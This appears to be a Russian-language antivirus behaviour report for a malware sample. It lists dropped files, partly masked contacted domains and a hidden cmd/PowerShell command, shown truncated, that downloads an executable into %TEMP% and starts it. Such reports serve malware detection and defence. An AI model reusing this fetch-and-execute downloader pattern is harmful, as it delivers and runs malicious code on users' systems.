Техническая информация
- $fhovz как %temp%\zfszqtq.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Otgfiecb3([String] $Fhovz){(New-Object System.Net.WebClient).DownloadFile($Fhovz,''%TEMP%\zfszqtq.exe'');Start-Process ''%TEMP%\zfszqtq.exe'';}try{Otgfiecb...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1336
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\tliki.bat
- %TEMP%\1164110.cvr
- 'ba###teks.com':80
- http://ba###teks.com/lopinost.bin
- DNS ASK ba###teks.com
- DNS ASK rs###tria.com
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Otgfiecb3([String] $Fhovz){(New-Object System.Net.WebClient).DownloadFile($Fhovz,''%TEMP%\zfszqtq.exe'');Start-Process ''%TEMP%\zfszqtq.exe'';}try{Otgfiecb...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\tliki.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\tliki.bat" "